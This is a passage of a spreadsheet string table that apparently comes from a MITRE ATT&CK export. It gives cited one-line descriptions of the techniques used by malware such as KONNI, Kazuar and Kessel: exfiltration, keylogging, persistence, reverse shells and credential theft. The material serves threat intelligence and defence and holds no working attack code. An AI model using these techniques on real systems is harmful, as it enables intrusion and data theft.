    <t>[KONNI](https://attack.mitre.org/software/S0356) has used FTP to exfiltrate reconnaissance data out.(Citation: Medium KONNI Jan 2020)</t>
  </si>
  <si>
    <t>relationship--27c397ca-aaa1-4cf5-b663-bde9b82050a6</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) can delete files.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>relationship--432f7a25-5994-4f50-8b75-c62c674f27a7</t>
  </si>
  <si>
    <t>A version of [KONNI](https://attack.mitre.org/software/S0356) searches for filenames created with a previous version of the malware, suggesting different versions targeted the same victims and the versions may work together.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>relationship--d4c9b3cb-44ca-47be-b10f-2371ef1c23df</t>
  </si>
  <si>
    <t xml:space="preserve">[KONNI](https://attack.mitre.org/software/S0356) can download files and execute them on the victim’s machine.(Citation: Talos Konni May 2017)(Citation: Malwarebytes Konni Aug 2021) </t>
  </si>
  <si>
    <t>relationship--8720f2bc-c099-4d2c-a9b4-faf019bf55a4</t>
  </si>
  <si>
    <t xml:space="preserve">[KONNI](https://attack.mitre.org/software/S0356) has executed malicious JavaScript code.(Citation: Malwarebytes Konni Aug 2021) </t>
  </si>
  <si>
    <t>relationship--eb17d12e-721b-4ebb-a4ff-8fe62a3189ca</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has the capability to perform keylogging.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>relationship--e77c6605-41e9-470f-80fc-2a383aeccc5e</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has relied on a victim to enable malicious macros within an attachment delivered via email.(Citation: Malwarebytes Konni Aug 2021)</t>
  </si>
  <si>
    <t>relationship--0baf5506-35fb-4508-ba9a-09ca2962df43</t>
  </si>
  <si>
    <t xml:space="preserve">[KONNI](https://attack.mitre.org/software/S0356) has pretended to be the xmlProv Network Provisioning service.(Citation: Malwarebytes Konni Aug 2021) </t>
  </si>
  <si>
    <t>relationship--5b530bcc-d137-4b4c-a22f-a3c15ec2f101</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has created a shortcut called "Anti virus service.lnk" in an apparent attempt to masquerade as a legitimate file.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>relationship--f4f3a2bc-d359-400e-8b1e-95d71a20c323</t>
  </si>
  <si>
    <t xml:space="preserve">[KONNI](https://attack.mitre.org/software/S0356) has modified registry keys of ComSysApp, Svchost, and xmlProv on the machine to gain persistence.(Citation: Medium KONNI Jan 2020)(Citation: Malwarebytes Konni Aug 2021) </t>
  </si>
  <si>
    <t>relationship--7431e309-f379-45a5-ae7d-0520f6b17a94</t>
  </si>
  <si>
    <t xml:space="preserve">[KONNI](https://attack.mitre.org/software/S0356) has hardcoded API calls within its functions to use on the victim's machine.(Citation: Malwarebytes Konni Aug 2021) </t>
  </si>
  <si>
    <t>relationship--9187cbc8-c0b5-440b-b10a-226684e968fc</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) is heavily obfuscated and includes encrypted configuration files.(Citation: Malwarebytes Konni Aug 2021)</t>
  </si>
  <si>
    <t>relationship--49df789a-5d6c-4820-af9f-7c4484531680</t>
  </si>
  <si>
    <t xml:space="preserve">[KONNI](https://attack.mitre.org/software/S0356) has used parent PID spoofing to spawn a new `cmd` process using `CreateProcessW` and a handle to `Taskmgr.exe`.(Citation: Malwarebytes Konni Aug 2021) </t>
  </si>
  <si>
    <t>relationship--3231ef46-26f9-4711-adfe-cfa68425f848</t>
  </si>
  <si>
    <t xml:space="preserve">[KONNI](https://attack.mitre.org/software/S0356) used PowerShell to download and execute a specific 64-bit version of the malware.(Citation: Talos Konni May 2017)(Citation: Malwarebytes Konni Aug 2021) </t>
  </si>
  <si>
    <t>relationship--7425e191-ec5c-40ec-ab5f-fb99d6064422</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has used the command &lt;code&gt;cmd /c tasklist&lt;/code&gt; to get a snapshot of the current processes on the target machine.(Citation: Medium KONNI Jan 2020)(Citation: Malwarebytes Konni Aug 2021)</t>
  </si>
  <si>
    <t>relationship--726cd7e2-d545-4ddf-8f86-fe1cab083dae</t>
  </si>
  <si>
    <t>A version of [KONNI](https://attack.mitre.org/software/S0356) has dropped a Windows shortcut into the Startup folder to establish persistence.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>relationship--475d30ee-999c-470c-b4b3-eed40d1db799</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has used Rundll32 to execute its loader for privilege escalation purposes.(Citation: Medium KONNI Jan 2020)(Citation: Malwarebytes Konni Aug 2021)</t>
  </si>
  <si>
    <t>relationship--b5c85267-6a3e-4254-a851-3529f4f80b55</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) can take screenshots of the victim’s machine.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>relationship--af7323ae-bb42-49fd-9c8d-218a1335f662</t>
  </si>
  <si>
    <t>A version of [KONNI](https://attack.mitre.org/software/S0356) drops a Windows shortcut on the victim’s machine to establish persistence.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>relationship--e57361ca-1d03-4171-86e2-09f8c32cb319</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has been packed for obfuscation.(Citation: Malwarebytes KONNI Evolves Jan 2022)</t>
  </si>
  <si>
    <t>relationship--347b7512-1e76-456f-9f04-0179d056ca9a</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has been delivered via spearphishing campaigns through a malicious Word document.(Citation: Malwarebytes Konni Aug 2021)</t>
  </si>
  <si>
    <t>relationship--b23e8d31-bb6a-42b4-ab34-1c9e302a3b74</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has used a custom base64 key to encode stolen data before exfiltration.(Citation: Medium KONNI Jan 2020)</t>
  </si>
  <si>
    <t>relationship--9dffc323-ae0a-430e-b9de-e059862432a1</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has used AES to encrypt C2 traffic.(Citation: Malwarebytes KONNI Evolves Jan 2022)</t>
  </si>
  <si>
    <t>relationship--ce43264e-ab32-45a7-898f-0320c477c581</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</si>
  <si>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</si>
  <si>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relationship--172da5b1-cf68-468a-8208-b15ea5c813dc</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) can collect the IP address from the victim’s machine.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>relationship--2251e15a-5b62-408d-b6a0-01aa8e2677b3</t>
  </si>
  <si>
    <t xml:space="preserve">[KONNI](https://attack.mitre.org/software/S0356) has used &lt;code&gt;net session&lt;/code&gt; on the victim's machine.(Citation: Malwarebytes Konni Aug 2021) </t>
  </si>
  <si>
    <t>relationship--28fd47e4-d76e-4cd2-8ad2-745d1d0a5c72</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) can collect the username from the victim’s machine.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>relationship--412c7c8b-4821-4f08-a3d2-2da034f8343f</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has used HTTP POST for C2.(Citation: Talos Konni May 2017)(Citation: Malwarebytes Konni Aug 2021)</t>
  </si>
  <si>
    <t>relationship--37b3a79f-6f48-4c5c-9ec7-b063ad375083</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</si>
  <si>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</si>
  <si>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relationship--afb593c0-5388-441c-a868-c8bc520ffcaa</t>
  </si>
  <si>
    <t xml:space="preserve">[KONNI](https://attack.mitre.org/software/S0356) has registered itself as a service using its export function.(Citation: Malwarebytes Konni Aug 2021) </t>
  </si>
  <si>
    <t>relationship--92671dd1-74a4-4bf4-8a04-6577674614d8</t>
  </si>
  <si>
    <t>[KOPILUWAK](https://attack.mitre.org/software/S1075) can gather information from compromised hosts.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--ec4231fc-c081-4060-80fb-05f390e5f24c</t>
  </si>
  <si>
    <t>[KOPILUWAK](https://attack.mitre.org/software/S1075) has exfiltrated collected data to its C2 via POST requests.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--a5931b14-3087-4fc5-8167-498fc1af23f1</t>
  </si>
  <si>
    <t xml:space="preserve">[KOPILUWAK](https://attack.mitre.org/software/S1075) had used Javascript to perform its core functions.(Citation: Mandiant Suspected Turla Campaign February 2023) </t>
  </si>
  <si>
    <t>relationship--f3f85cfd-557c-45c1-82ae-a9e349c8714c</t>
  </si>
  <si>
    <t>[KOPILUWAK](https://attack.mitre.org/software/S1075) has piped the results from executed C2 commands to `%TEMP%\result2.dat` on the local machine.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--ef651fd2-97e7-4471-a609-41f46003cf11</t>
  </si>
  <si>
    <t>[KOPILUWAK](https://attack.mitre.org/software/S1075) has gained execution through malicious attachments.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--4f99a9ac-ccd8-4c9b-9893-0703ba60543c</t>
  </si>
  <si>
    <t>[KOPILUWAK](https://attack.mitre.org/software/S1075) can use [netstat](https://attack.mitre.org/software/S0104) and [Net](https://attack.mitre.org/software/S0039) to discover network shares.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--7e7479b9-57c6-4c40-898b-3c590e93d6f1</t>
  </si>
  <si>
    <t>[KOPILUWAK](https://attack.mitre.org/software/S1075) can enumerate current running processes on the targeted machine.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--63cefb36-bc55-4536-b7f9-c80f9e3f69b3</t>
  </si>
  <si>
    <t>[KOPILUWAK](https://attack.mitre.org/software/S1075) has been delivered to victims as a malicious email attachment.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--da37b8c0-7006-43f9-aebb-44ae51a54dd0</t>
  </si>
  <si>
    <t>[KOPILUWAK](https://attack.mitre.org/software/S1075) can discover logical drive information on compromised hosts.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--b3bc70ea-4f9e-4933-81e7-eb8b19f89a3b</t>
  </si>
  <si>
    <t>[KOPILUWAK](https://attack.mitre.org/software/S1075) can use [Arp](https://attack.mitre.org/software/S0099) to discover a target's network configuration setttings.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--92bea968-016f-4aa7-b58c-8fcc981d9601</t>
  </si>
  <si>
    <t>[KOPILUWAK](https://attack.mitre.org/software/S1075) can use [netstat](https://attack.mitre.org/software/S0104), [Arp](https://attack.mitre.org/software/S0099), and [Net](https://attack.mitre.org/software/S0039) to discover current TCP connections.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--c73f6319-ad09-4fb5-bb2f-18fd73bfdc5d</t>
  </si>
  <si>
    <t>[KOPILUWAK](https://attack.mitre.org/software/S1075) can conduct basic network reconnaissance on the victim machine with `whoami`, to get user details.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--f778e7e2-6119-4417-9f30-dfce65f6afe9</t>
  </si>
  <si>
    <t>[KOPILUWAK](https://attack.mitre.org/software/S1075) has used HTTP POST requests to send data to C2.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--46b38010-b34e-435e-8573-094d6186c7b2</t>
  </si>
  <si>
    <t>S0088</t>
  </si>
  <si>
    <t>Kasidet</t>
  </si>
  <si>
    <t>malware--26fed817-e7bf-41f9-829a-9075ffac45c2</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to change firewall settings to allow a plug-in to be downloaded.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>relationship--f81df2c8-1edd-4734-a1c9-cca6e4c56607</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to search for a given filename on a victim.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>relationship--ccb67d98-71d6-4a26-86b6-281174ca07b0</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to download and execute additional files.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>relationship--c39e878e-a496-4271-9998-2d5c9511e0a4</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to initiate keylogging.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>relationship--e45cdf20-e182-4346-8c98-a48575282ae6</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to search for a given process name in processes currently running in the system.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>relationship--4d90fd9d-9f9b-45f8-986d-3db43b679905</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) creates a Registry Run key to establish persistence.(Citation: Zscaler Kasidet)(Citation: Microsoft Kasidet)</t>
  </si>
  <si>
    <t>relationship--828afc32-9874-40aa-b752-315c7623ffee</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to initiate keylogging and screen captures.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>relationship--ade60661-8dfb-473a-8d12-014ba0273934</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to identify any anti-virus installed on the infected system.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>relationship--95a1ac52-e022-4c81-96cc-b7b39ca776d3</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to obtain a victim's system name and operating system version.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>relationship--49af09c8-1460-485d-9f09-dacea47fa016</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) can execute commands using cmd.exe.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>relationship--305ecc72-e820-44cb-ab52-593ccca814ff</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) gathers information about opened windows.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>relationship--afa84fd1-e910-4bc7-8270-1e9f9b02b53f</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) has used compromised WordPress blogs as C2 servers.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>relationship--9420f3cb-bd87-4dae-b8a7-0f1a5a14da55</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) can overwrite files with random data before deleting them.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>relationship--333bd465-8713-4918-b60d-6128c52cbf04</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) uploads files from a specified directory to the C2 server.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>relationship--e4f09baa-2eae-445f-b000-5de3db07ad34</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</si>
  <si>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</si>
  <si>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relationship--7b2329e5-eacf-4626-bc3c-43331bc09aef</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) can accept multiple URLs for C2 servers.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>relationship--950399e7-c9c2-4b53-bcc8-b99d0acba8d1</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) can delete files.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>relationship--3872901c-9601-413e-bf8a-e2fe35772c71</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) uses FTP and FTPS to communicate with the C2 server.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>relationship--7c44064a-f697-413c-b0b1-a6b92bf3cfc3</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) finds a specified directory, lists the files and metadata about those files.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>relationship--636be06a-5c19-45c8-b6be-c38634c583dc</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) downloads additional plug-ins to load on the victim’s machine, including the ability to upgrade and replace its own binary.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>relationship--2286857e-ad96-4dda-abac-988e8cadda5c</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) has used internal nodes on the compromised network for C2 communications.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>relationship--75367678-910c-4715-9fc8-ee503f8e41e5</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) gathers information on local groups and members on the victim’s machine.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>relationship--da11f44a-5af0-4b71-a049-a9ff85e2ba9b</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) stages command output and collected data in files before exfiltration.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>relationship--df48ab06-0916-4d1d-9142-d0a508d0f0d4</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) gathers information about local groups and members.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>relationship--77bd9ea1-9401-4128-a78a-bd28d43a6c99</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</si>
  <si>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</si>
  <si>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relationship--464e688d-b243-4619-a60b-1be6e2d6a827</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) obtains a list of running processes through WMI querying and the &lt;code&gt;ps&lt;/code&gt; command.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>relationship--5e462e1b-62ec-4b44-990d-acd3f7b0010c</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) adds a sub-key under several Registry run keys.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>relationship--1cb54b2e-5f2d-4d1b-9fda-9b17f49de65b</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) can sleep for a specific time and be set to communicate at specific intervals.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>relationship--c6c3192b-f541-4f19-b7b9-f2ad026c8ffb</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) captures screenshots of the victim’s screen.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>relationship--b2ae2606-fea8-4caf-a79e-91f09932d6d4</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) adds a .lnk file to the Windows startup folder.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>relationship--fc572a1d-a44d-4588-b31d-1c54116d12f4</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) encodes communications to the C2 server in Base64.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>relationship--596f9132-84e2-42c9-ad58-8833fe38b1e6</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) gathers information on the system and local drives.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>relationship--8bbf259b-029b-48fa-859b-5dbbbcd98b53</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) gathers information about network adapters.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>relationship--e534bf54-5f9f-4d5f-bd9d-260e56da4951</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) gathers information on users.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>relationship--719f0c42-8eb8-461b-8f35-cf5dfc42e47b</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) uses /bin/bash to execute commands on the victim’s machine.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>relationship--7a9e9275-44c2-40c9-9eb3-cafc54503874</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) captures images from the webcam.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>relationship--79852ad8-86ff-4747-97c0-1c7faa5fa69d</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) uses HTTP and HTTPS to communicate with the C2 server. [Kazuar](https://attack.mitre.org/software/S0265) can also act as a webserver and listen for inbound HTTP requests through an exposed API.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>relationship--abf2b5db-184b-42af-bb52-e018977ca870</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) uses cmd.exe to execute commands on the victim’s machine.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>relationship--fcd2604b-6954-4bd8-b0c6-22221b6dd1ce</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) obtains a list of running processes through WMI querying.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>relationship--f1eaa7b9-4320-4549-aaa5-f992aad3ae1e</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) can install itself as a new service.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>relationship--88ad4f5a-f127-435c-a8a0-6a6fceddfa47</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) can use DLL side-loading to load malicious DLLs.(Citation: Unit 42 KerrDown February 2019)</t>
  </si>
  <si>
    <t>relationship--79460858-f878-417f-bc10-b4c962128df4</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) can decode, decrypt, and decompress multiple layers of shellcode.(Citation: Unit 42 KerrDown February 2019)</t>
  </si>
  <si>
    <t>relationship--cd82d148-f6b1-4247-8ccf-49fadbe7f245</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) can download specific payloads to a compromised host based on OS architecture.(Citation: Unit 42 KerrDown February 2019)</t>
  </si>
  <si>
    <t>relationship--9f57a541-c6d1-490f-bd15-1dee6280365b</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) has gained execution through victims opening malicious files.(Citation: Amnesty Intl. Ocean Lotus February 2021)(Citation: Unit 42 KerrDown February 2019)</t>
  </si>
  <si>
    <t>relationship--e69ac347-8b74-4fcc-8b13-17d7a1b04339</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) has gained execution through victims opening malicious links.(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>relationship--e733d4b5-0881-4de8-9461-58ca239b7c82</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) can encrypt, encode, and compress multiple layers of shellcode.(Citation: Unit 42 KerrDown February 2019)</t>
  </si>
  <si>
    <t>relationship--72f0af8b-eb82-40d2-aa74-3ab60b72afb8</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) has been distributed through malicious e-mail attachments.(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>relationship--4224c436-0960-4cea-b135-166008a1c087</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) has been distributed via e-mails containing a malicious link.(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>relationship--0160acb0-db44-4076-acc6-74c872d5aa08</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) has the ability to determine if the compromised host is running a 32 or 64 bit OS architecture.(Citation: Unit 42 KerrDown February 2019)</t>
  </si>
  <si>
    <t>relationship--7727f1e9-4914-4512-a319-3e5758c47602</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) can use a VBS base64 decoder function published by Motobit.(Citation: Unit 42 KerrDown February 2019)</t>
  </si>
  <si>
    <t>relationship--08e172e1-561d-4bb9-a1a5-259131686547</t>
  </si>
  <si>
    <t>S0487</t>
  </si>
  <si>
    <t>Kessel</t>
  </si>
  <si>
    <t>malware--c984b414-b766-44c5-814a-2fe96c913c12</t>
  </si>
  <si>
    <t xml:space="preserve">[Kessel](https://attack.mitre.org/software/S0487) can RC4-encrypt credentials before sending to the C2.(Citation: ESET ForSSHe December 2018)	</t>
  </si>
  <si>
    <t>relationship--9433ea0e-0bae-44b6-b32b-5290356f057b</t>
  </si>
  <si>
    <t xml:space="preserve">[Kessel](https://attack.mitre.org/software/S0487) can create a reverse shell between the infected host and a specified system.(Citation: ESET ForSSHe December 2018)	</t>
  </si>
  <si>
    <t>relationship--46da305e-d59a-42a4-9d2b-cdd223c69664</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) has maliciously altered the OpenSSH binary on targeted systems to create a backdoor.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>relationship--68e017e5-ee14-4e33-9907-2537fbbdb117</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) can split the data to be exilftrated into chunks that will fit in subdomains of DNS queries.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>relationship--45852cf6-f0e8-45b8-9636-0dee90f7d2fc</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) has decrypted the binary's configuration once the &lt;code&gt;main&lt;/code&gt; function was launched.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>relationship--54e76e33-91b4-409f-a784-7e181f82b216</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) has exfiltrated information gathered from the infected system to the C2 server.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>relationship--acd25956-0e08-4643-a121-33f20eb4b24c</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) can exfiltrate credentials and other information via HTTP POST request, TCP, and DNS.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>relationship--c291bd7d-bf11-4be0-8d31-77055bb7675a</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) can download additional modules from the C2 server.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>relationship--25f5e7b1-4f7f-48e1-b647-16a4ac018357</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) has trojanized the &lt;sode&gt;ssh_login&lt;/code&gt; and &lt;code&gt;user-auth_pubkey&lt;/code&gt; functions to steal plaintext credentials.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>relationship--8544d4c3-e2e5-44c6-b57d-a169143f49eb</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487)'s configuration is hardcoded and RC4 encrypted within the binary.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>relationship--02eba953-12a6-434a-bc67-2337864cf560</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) can use a proxy during exfiltration if set in the configuration.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>relationship--75aa57b2-5d2e-49ec-9c26-317b361632c3</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) has exfiltrated data via hexadecimal-encoded subdomain fields of DNS queries.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>relationship--90126438-03a9-47c8-98c1-222a1d79ef21</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) has collected the system architecture, OS version, and MAC address information.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>relationship--6e9c79b0-9b63-4785-be48-033ab5f55a18</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) has collected the DNS address of the infected host.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>relationship--5812d086-babd-4b26-8d69-62cebcfc5fc4</t>
  </si>
  <si>
    <t>Variants of [Kevin](https://attack.mitre.org/software/S1020) can communicate over DNS through queries to the server for constructed domain names with embedded information.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--11c19a8d-fd24-4c59-9a5f-4910f5471e71</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can create directories to store logs and other collected data.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--a87a63cc-7920-4b23-a804-d1ad94ffc120</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can exfiltrate data to the C2 server in 27-character chunks.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--681857ae-6461-4070-a2b8-1fb53972ab38</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can upload logs and other data from a compromised host.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--986db6f9-d2ad-4ab9-98b6-5633e101e804</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) can send data from the victim host through a DNS C2 channel.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--566913fd-3f30-4d33-b275-4a8c8f31a1c3</t>
